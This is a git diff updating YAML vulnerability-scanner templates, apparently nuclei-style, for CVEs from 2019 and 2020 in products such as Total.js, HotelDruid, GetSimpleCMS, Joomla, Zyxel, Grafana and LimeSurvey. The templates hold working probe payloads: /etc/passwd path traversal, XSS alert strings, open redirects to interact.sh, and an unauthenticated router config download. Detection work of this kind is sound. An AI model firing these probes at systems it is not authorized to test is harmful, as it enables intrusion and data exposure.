+  name: Totaljs <3.2.3 - Local File Inclusion
   author: madrobot
   severity: high
-  description: index.js in Total.js Platform before 3.2.3 allows path traversal.
+  description: Total.js Platform before 3.2.3 is vulnerable to local file inclusion.
   reference:
     - https://blog.certimetergroup.com/it/articolo/security/total.js-directory-traversal-cve-2019-8903
     - https://github.com/totaljs/framework/commit/c37cafbf3e379a98db71c1125533d1e8d5b5aef7
     - https://github.com/totaljs/framework/commit/de16238d13848149f5d1dae51f54e397a525932b
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-8903
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -29,3 +30,5 @@ requests:
         words:
           - "apache2.conf"
         part: body
+
+# Enhanced by mp on 2022/07/08
diff --git a/cves/2019/CVE-2019-8937.yaml b/cves/2019/CVE-2019-8937.yaml
index 0a31a5bf7f..54a8385214 100644
--- a/cves/2019/CVE-2019-8937.yaml
+++ b/cves/2019/CVE-2019-8937.yaml
@@ -1,18 +1,23 @@
 id: CVE-2019-8937
 
 info:
-  name: HotelDruid 2.3.0 - XSS
+  name: HotelDruid 2.3.0 - Cross-Site Scripting
   author: LogicalHunter
   severity: medium
-  description: HotelDruid 2.3.0 has XSS affecting the nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php.
+  description: HotelDruid 2.3.0 contains a cross-site scripting vulnerability affecting nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php.
   reference:
     - https://www.exploit-db.com/exploits/46429
+    - https://sourceforge.net/projects/hoteldruid/
+    - http://packetstormsecurity.com/files/151779/HotelDruid-2.3-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-8937
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-8937
     cwe-id: CWE-79
-  tags: cve,cve2019,xss,hoteldruid
+  metadata:
+    verified: "true"
+  tags: packetstorm,cve,cve2019,xss,hoteldruid,edb
 
 requests:
   - method: GET
@@ -28,10 +33,16 @@ requests:
     matchers:
       - type: word
         words:
-          - '"</script><script>alert(document.domain)</script>'
+          - '"</script><script>alert(document.domain)</script>"><input'
         part: body
 
       - type: word
         words:
           - "text/html"
         part: header
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-8982.yaml b/cves/2019/CVE-2019-8982.yaml
index abd568261b..607a1aea0a 100644
--- a/cves/2019/CVE-2019-8982.yaml
+++ b/cves/2019/CVE-2019-8982.yaml
@@ -13,7 +13,7 @@ info:
     cvss-score: 9.6
     cve-id: CVE-2019-8982
     cwe-id: CWE-918
-  tags: cve,cve2019,wavemaker,lfi,ssrf
+  tags: cve,cve2019,wavemaker,lfi,ssrf,edb
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-9041.yaml b/cves/2019/CVE-2019-9041.yaml
index 63f362d687..71298e4492 100644
--- a/cves/2019/CVE-2019-9041.yaml
+++ b/cves/2019/CVE-2019-9041.yaml
@@ -1,19 +1,20 @@
 id: CVE-2019-9041
 
 info:
-  name: ZZZCMS 1.6.1 RCE
+  name: ZZZCMS 1.6.1 - Remote Code Execution
   author: pikpikcu
   severity: high
-  description: An issue was discovered in ZZZCMS zzzphp V1.6.1. In the inc/zzz_template.php file, the parserIfLabel() function's filtering is not strict, resulting in PHP code execution, as demonstrated by the if:assert substring.
+  description: ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring.
   reference:
-    - http://www.iwantacve.cn/index.php/archives/118/
     - https://www.exploit-db.com/exploits/46454/
+    - http://www.iwantacve.cn/index.php/archives/118/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-9041
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 7.2
     cve-id: CVE-2019-9041
     cwe-id: CWE-917
-  tags: cve,cve2019,zzzcms,rce
+  tags: cve,cve2019,zzzcms,rce,edb
 
 requests:
   - method: POST
@@ -34,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/08
diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml
index d2563f9e28..3849fff454 100644
--- a/cves/2019/CVE-2019-9618.yaml
+++ b/cves/2019/CVE-2019-9618.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2019-9618
     cwe-id: CWE-22
-  tags: cve,cve2019,wordpress,wp-plugin,lfi
+  tags: wordpress,wp-plugin,lfi,seclists,edb,cve,cve2019
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-9670.yaml b/cves/2019/CVE-2019-9670.yaml
index a9aa70d3a2..3f0d4ec281 100644
--- a/cves/2019/CVE-2019-9670.yaml
+++ b/cves/2019/CVE-2019-9670.yaml
@@ -18,7 +18,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2019-9670
     cwe-id: CWE-611
-  tags: cve,cve2019,zimbra,xxe
+  tags: cve,cve2019,zimbra,xxe,kev,edb,packetstorm
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-9726.yaml b/cves/2019/CVE-2019-9726.yaml
index be6c171e2b..3d72166b96 100644
--- a/cves/2019/CVE-2019-9726.yaml
+++ b/cves/2019/CVE-2019-9726.yaml
@@ -1,16 +1,15 @@
 id: CVE-2019-9726
 
 info:
-  name: Homematic CCU3 - Directory Traversal / Arbitrary File Read
+  name: Homematic CCU3 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Directory Traversal / Arbitrary File Read in eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem. This vulnerability can be exploited
-    by unauthenticated attackers with access to the web interface.
+  description: eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.
   reference:
     - https://atomic111.github.io/article/homematic-ccu3-fileread
-    - https://www.cvedetails.com/cve/CVE-2019-9726
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-9726
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2019-9726
     cwe-id: CWE-22
@@ -33,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/08
diff --git a/cves/2019/CVE-2019-9733.yaml b/cves/2019/CVE-2019-9733.yaml
index 15cb9c7839..51553da5a5 100644
--- a/cves/2019/CVE-2019-9733.yaml
+++ b/cves/2019/CVE-2019-9733.yaml
@@ -14,7 +14,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2019-9733
-  tags: cve,cve2019,artifactory,login
+  tags: packetstorm,cve,cve2019,artifactory,login
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-9915.yaml b/cves/2019/CVE-2019-9915.yaml
new file mode 100644
index 0000000000..a985850155
--- /dev/null
+++ b/cves/2019/CVE-2019-9915.yaml
@@ -0,0 +1,35 @@
+id: CVE-2019-9915
+
+info:
+  name: GetSimpleCMS 3.3.13 - Open Redirection
+  author: 0x_Akoko
+  severity: medium
+  description: GetSimpleCMS 3.3.13 has an Open Redirect via the admin/index.php redirect parameter.
+  reference:
+    - https://www.invicti.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms
+    - https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300
+    - https://www.cvedetails.com/cve/CVE-2019-9915
+    - https://www.netsparker.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2019-9915
+    cwe-id: CWE-601
+  metadata:
+    verified: "true"
+  tags: cve,cve2019,redirect,getsimple,cms
+
+requests:
+  - raw:
+      - |
+        POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        userid={{username}}&pwd={{password}}&submitted=Login
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2019/CVE-2019-9922.yaml b/cves/2019/CVE-2019-9922.yaml
new file mode 100644
index 0000000000..196f28ed33
--- /dev/null
+++ b/cves/2019/CVE-2019-9922.yaml
@@ -0,0 +1,36 @@
+id: CVE-2019-9922
+
+info:
+  name: Joomla! Harmis Messenger 1.2.2 - Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  description: Joomla! Harmis Messenger 1.2.2 is vulnerable to local file inclusion which could give an attacker read access to arbitrary files.
+  reference:
+    - https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md
+    - https://www.cvedetails.com/cve/CVE-2019-9922
+    - https://extensions.joomla.org/extension/je-messenger/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-9922
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2019-9922
+    cwe-id: CWE-22
+  tags: cve,cve2019,joomla,messenger,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2019/CVE-2019-9955.yaml b/cves/2019/CVE-2019-9955.yaml
index 7489a0c820..48deabbe87 100644
--- a/cves/2019/CVE-2019-9955.yaml
+++ b/cves/2019/CVE-2019-9955.yaml
@@ -1,23 +1,22 @@
 id: CVE-2019-9955
 
 info:
-  name: Zyxel - Reflected Cross-site Scripting
+  name: Zyxel - Cross-Site Scripting
   author: pdteam
   severity: medium
-  description: On Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, ZyWALL 1100 devices, the security
-    firewall login page is vulnerable to Reflected XSS via the unsanitized 'mp_idx' parameter.
+  description: Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, and ZyWALL 1100 devices contain a reflected cross-site scripting vulnerability on the security firewall login page via the mp_idx parameter.
   reference:
     - http://packetstormsecurity.com/files/152525/Zyxel-ZyWall-Cross-Site-Scripting.html
-    - http://seclists.org/fulldisclosure/2019/Apr/22
     - https://www.exploit-db.com/exploits/46706/
     - https://www.securitymetrics.com/blog/Zyxel-Devices-Vulnerable-Cross-Site-Scripting-Login-page
     - https://www.zyxel.com/support/reflected-cross-site-scripting-vulnerability-of-firewalls.shtml
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-9955
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-9955
     cwe-id: CWE-79
-  tags: cve,cve2019,xss,zyxel
+  tags: zyxel,packetstorm,seclists,edb,cve,cve2019,xss
 
 requests:
   - method: GET
@@ -31,3 +30,5 @@ requests:
           - "\";alert('1');//"
           - "<title>Welcome</title>"
         condition: and
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-9978.yaml b/cves/2019/CVE-2019-9978.yaml
index 8aa5e0ec58..8df8646571 100644
--- a/cves/2019/CVE-2019-9978.yaml
+++ b/cves/2019/CVE-2019-9978.yaml
@@ -1,19 +1,22 @@
 id: CVE-2019-9978
 
 info:
-  name: WordPress social-warfare RFI
+  name: WordPress Social Warfare <3.5.3 - Cross-Site Scripting
   author: madrobot,dwisiswant0
   severity: medium
-  description: The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social
-    Warfare and Social Warfare Pro.
+  description: WordPress Social Warfare plugin before 3.5.3 contains a cross-site scripting vulnerability via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, affecting Social Warfare and Social Warfare Pro.
   reference:
     - https://github.com/mpgn/CVE-2019-9978
+    - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/
+    - https://www.pluginvulnerabilities.com/2019/03/21/full-disclosure-of-settings-change-persistent-cross-site-scripting-xss-vulnerability-in-social-warfare/
+    - https://www.cybersecurity-help.cz/vdb/SB2019032105
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-9978
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-9978
     cwe-id: CWE-79
-  tags: cve,cve2019,wordpress,wp-plugin,ssrf
+  tags: cve,cve2019,wordpress,wp-plugin,ssrf,kev
 
 requests:
   - method: GET
@@ -30,3 +33,5 @@ requests:
         part: interactsh_protocol
         words:
           - "http"
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2020/CVE-2020-0618.yaml b/cves/2020/CVE-2020-0618.yaml
index ff80edb65b..459f230148 100644
--- a/cves/2020/CVE-2020-0618.yaml
+++ b/cves/2020/CVE-2020-0618.yaml
@@ -1,19 +1,22 @@
 id: CVE-2020-0618
 
 info:
-  name: RCE in SQL Server Reporting Services
+  name: Microsoft SQL Server Reporting Services - Remote Code Execution
   author: joeldeleep
   severity: high
-  description: A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests, aka 'Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability'.
+  description: Microsoft SQL Server Reporting Services is vulnerable to a remote code execution vulnerability because it incorrectly handles page requests.
   reference:
     - https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/
     - https://github.com/euphrat1ca/CVE-2020-0618
+    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618
+    - http://packetstormsecurity.com/files/156707/SQL-Server-Reporting-Services-SSRS-ViewState-Deserialization.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-0618
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2020-0618
     cwe-id: CWE-502
-  tags: cve,cve2020,rce
+  tags: cve2020,rce,packetstorm,cve
 
 requests:
   - method: GET
@@ -27,4 +30,6 @@ requests:
       - type: word
         words:
           - "view report"
-        part: body
\ No newline at end of file
+        part: body
+
+# Enhanced by mp on 2022/07/08
diff --git a/cves/2020/CVE-2020-10148.yaml b/cves/2020/CVE-2020-10148.yaml
index 21fdf6711d..b9143655dc 100644
--- a/cves/2020/CVE-2020-10148.yaml
+++ b/cves/2020/CVE-2020-10148.yaml
@@ -1,23 +1,23 @@
 id: CVE-2020-10148
 
 info:
-  name: SolarWinds Orion API Auth Bypass Leads to RCE (SUPERNOVA)
+  name: SolarWinds Orion API - Auth Bypass
   author: dwisiswant0
   severity: critical
   description: |
-    This template could allow to bypass authentication and execute API
-    commands which may result in a compromise of the SolarWinds instance.
+    SolarWinds Orion API is vulnerable to an authentication bypass vulnerability that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected.
   reference:
     - https://kb.cert.org/vuls/id/843464
     - https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/solarwinds-lfi-cve-2020-10148.yaml
     - https://gist.github.com/0xsha/75616ef6f24067c4fb5b320c5dfa4965
     - https://twitter.com/0xsha/status/1343800953946787847
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-10148
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-10148
     cwe-id: CWE-287
-  tags: cve,cve2020,solarwinds,rce,auth,bypass
+  tags: cve,cve2020,solarwinds,rce,auth-bypass,kev
 
 requests:
   - method: GET
@@ -43,3 +43,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/16
diff --git a/cves/2020/CVE-2020-10547.yaml b/cves/2020/CVE-2020-10547.yaml
index 7f55121cb2..fdef0f4534 100644
--- a/cves/2020/CVE-2020-10547.yaml
+++ b/cves/2020/CVE-2020-10547.yaml
@@ -4,10 +4,11 @@ info:
   name: rConfig 3.9.4 SQL Injection
   author: madrobot
   severity: critical
-  description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral
-    movement, granting an attacker access to monitored network devices.
+  description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
   reference:
     - https://github.com/theguly/exploits/blob/master/CVE-2020-10547.py https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
+    - https://github.com/theguly/exploits/blob/master/CVE-2020-10547.py
+    - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2020/CVE-2020-10770.yaml b/cves/2020/CVE-2020-10770.yaml
index eafefaf8c4..a06562e742 100644
--- a/cves/2020/CVE-2020-10770.yaml
+++ b/cves/2020/CVE-2020-10770.yaml
@@ -1,21 +1,21 @@
 id: CVE-2020-10770
 
 info:
-  name: Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
+  name: Keycloak 12.0.1 - request_uri  Blind Server-Side Request Forgery (SSRF)
   author: dhiyaneshDk
   severity: medium
-  description: A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter request_uri. This flaw allows an attacker to use this parameter
-    to execute a Server-side request forgery (SSRF) attack.
+  description: Keycloak 12.0.1 and below allow an attacker to force the server to request an unverified URL using the OIDC parameter request_uri. This allows an attacker to execute a server-side request forgery (SSRF) attack.
   reference:
     - https://packetstormsecurity.com/files/164499/Keycloak-12.0.1-Server-Side-Request-Forgery.html
     - https://www.exploit-db.com/exploits/50405
     - https://nvd.nist.gov/vuln/detail/CVE-2020-10770
+    - https://bugzilla.redhat.com/show_bug.cgi?id=1846270
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
     cvss-score: 5.3
     cve-id: CVE-2020-10770
     cwe-id: CWE-601
-  tags: keycloak,ssrf,oast,cve,cve2020,blind
+  tags: keycloak,ssrf,oast,cve,cve2020,blind,packetstorm,edb
 
 requests:
   - method: GET
@@ -27,3 +27,5 @@ requests:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
+
+# Enhanced by cs 08/03/2022
diff --git a/cves/2020/CVE-2020-10973.yaml b/cves/2020/CVE-2020-10973.yaml
new file mode 100644
index 0000000000..569f8d7403
--- /dev/null
+++ b/cves/2020/CVE-2020-10973.yaml
@@ -0,0 +1,43 @@
+id: CVE-2020-10973
+
+info:
+  name: Wavlink WN530HG4 - Access Control
+  author: arafatansari
+  severity: high
+  description: |
+    An issue was discovered in Wavlink WN530HG4, Wavlink WN531G3, Wavlink WN533A8, and Wavlink WN551K1 affecting /cgi-bin/ExportAllSettings.sh where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available.
+  reference:
+    - https://github.com/sudo-jtcsec/CVE/blob/master/CVE-2020-10973
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-10973
+    - https://github.com/sudo-jtcsec/Nyra
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2020-10973
+    cwe-id: CWE-306
+  metadata:
+    shodan-query: http.html:"Wavlink"
+    verified: "true"
+  tags: cve,cve2020,exposure,wavlink
+
+requests:
+  - raw:
+      - |
+        GET /backupsettings.dat HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Salted__'
+
+      - type: word
+        part: header
+        words:
+          - application/octet-stream
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2020/CVE-2020-11034.yaml b/cves/2020/CVE-2020-11034.yaml
index efb62f4314..fa1e54195e 100644
--- a/cves/2020/CVE-2020-11034.yaml
+++ b/cves/2020/CVE-2020-11034.yaml
@@ -5,11 +5,11 @@ info:
   author: pikpikcu
   severity: medium
   description: GLPI prior 9.4.6 contains an open redirect vulnerability based on a regexp.
-  remediation: Upgrade to version 9.4.6 or later.
   reference:
     - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
     - https://github.com/glpi-project/glpi/archive/9.4.6.zip
     - https://nvd.nist.gov/vuln/detail/CVE-2020-11034
+  remediation: Upgrade to version 9.4.6 or later.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -21,13 +21,13 @@ requests:
   - method: GET
 
     path:
-      - '{{BaseURL}}/index.php?redirect=/\/evil.com/'
-      - '{{BaseURL}}/index.php?redirect=//evil.com'
+      - '{{BaseURL}}/index.php?redirect=/\/interact.sh/'
+      - '{{BaseURL}}/index.php?redirect=//interact.sh'
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
         part: header
 
 # Enhanced by mp on 2022/05/04
diff --git a/cves/2020/CVE-2020-11110.yaml b/cves/2020/CVE-2020-11110.yaml
index 8357dfcf1e..5ee827da43 100644
--- a/cves/2020/CVE-2020-11110.yaml
+++ b/cves/2020/CVE-2020-11110.yaml
@@ -1,20 +1,23 @@
 id: CVE-2020-11110
 
 info:
-  name: Grafana Unauthenticated Stored XSS
+  name: Grafana <=6.7.1 - Cross-Site Scripting
   author: emadshanab
   severity: medium
-  description: Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open
-    Original Dashboard after visiting the snapshot.
+  description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
   reference:
-    - https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
+    - https://web.archive.org/web/20210717142945/https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
+    - https://github.com/grafana/grafana/blob/master/CHANGELOG.md
+    - https://security.netapp.com/advisory/ntap-20200810-0002/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-11110
+  remediation: This issue can be resolved by updating Grafana to the latest version.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2020-11110
     cwe-id: CWE-79
-  remediation: This issue can be resolved by updating Grafana to the latest version.
+  metadata:
+    shodan-query: title:"Grafana"
   tags: cve,cve2020,xss,grafana
 
 requests:
@@ -54,3 +57,5 @@ requests:
         group: 1
         regex:
           - '"url":"([a-z:/0-9A-Z]+)"'
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2020/CVE-2020-11455.yaml b/cves/2020/CVE-2020-11455.yaml
index c37c3a7f48..3144ec60f6 100644
--- a/cves/2020/CVE-2020-11455.yaml
+++ b/cves/2020/CVE-2020-11455.yaml
@@ -1,19 +1,22 @@
 id: CVE-2020-11455
 
 info:
-  name: LimeSurvey 4.1.11 - Path Traversal
+  name: LimeSurvey 4.1.11 - Local File Inclusion
   author: daffainfo
-  severity: medium
-  description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
+  severity: critical
+  description: LimeSurvey before 4.1.12+200324 is vulnerable to local file inclusion because it contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
   reference:
     - https://www.exploit-db.com/exploits/48297
     - https://www.cvedetails.com/cve/CVE-2020-11455
+    - https://github.com/LimeSurvey/LimeSurvey/commit/daf50ebb16574badfb7ae0b8526ddc5871378f1b
+    - http://packetstormsecurity.com/files/157112/LimeSurvey-4.1.11-Path-Traversal.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-11455
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
-    cvss-score: 5.3
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2020-11455
     cwe-id: CWE-22
-  tags: cve,cve2020,lfi
+  tags: cve2020,lfi,edb,packetstorm,cve
 
 requests:
   - method: GET
@@ -30,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2020/CVE-2020-11529.yaml b/cves/2020/CVE-2020-11529.yaml
index e9dd64648a..c4fcacdf4f 100644
--- a/cves/2020/CVE-2020-11529.yaml
+++ b/cves/2020/CVE-2020-11529.yaml
@@ -9,22 +9,23 @@ info:
     - https://github.com/getgrav/grav/issues/3134
     - https://www.cvedetails.com/cve/CVE-2020-11529
     - https://nvd.nist.gov/vuln/detail/CVE-2020-11529
+    - https://github.com/getgrav/grav/commit/2eae104c7a4bf32bc26cb8073d5c40464bfda3f7
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2020-11529
     cwe-id: CWE-601
-  tags: cve,cve2019,redirect,grav,getgrav
+  tags: cve,cve2020,redirect,grav,getgrav
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/%252f%255cexample.com%252fa%253fb/'
+      - '{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/'
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
         part: header
 
 # Enhanced by mp on 2022/05/04
diff --git a/cves/2020/CVE-2020-11547.yaml b/cves/2020/CVE-2020-11547.yaml
index 23ac092fb2..eac278a7a9 100644
--- a/cves/2020/CVE-2020-11547.yaml
+++ b/cves/2020/CVE-2020-11547.yaml
@@ -8,6 +8,7 @@ info:
   reference:
     - https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure
     - https://nvd.nist.gov/vuln/detail/CVE-2020-11547
+    - https://github.com/ch-rigu/PRTG-Network-Monitor-Information-Disclosure
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
@@ -26,13 +27,12 @@ requests:
     matchers:
       - type: dsl
         dsl:
-          - "contains((body_1), 'Probe #1') && contains((body_2), '<span>Configuration Requests Sent</span>')"
-        part: body
+          - "contains(body_1, 'Probe #1') && contains(body_2, '<span>Configuration Requests Sent</span>')"
 
       - type: word
+        part: body
         words:
           - "prtg_network_monitor"
-        part: body
 
       - type: status
         status:
diff --git a/cves/2020/CVE-2020-11710.yaml b/cves/2020/CVE-2020-11710.yaml
index 1c78fd24bf..e6a4facc87 100644
--- a/cves/2020/CVE-2020-11710.yaml
+++ b/cves/2020/CVE-2020-11710.yaml
@@ -1,12 +1,15 @@
 id: CVE-2020-11710
 
 info:
-  name: Kong Admin Rest API Unauth
+  name: Kong Admin <=2.03 - Admin API Access
   author: pikpikcu
   severity: critical
-  description: An issue was discovered in docker-kong (for Kong) through 2.0.3. The admin API port may be accessible on interfaces other than 127.0.0.1.
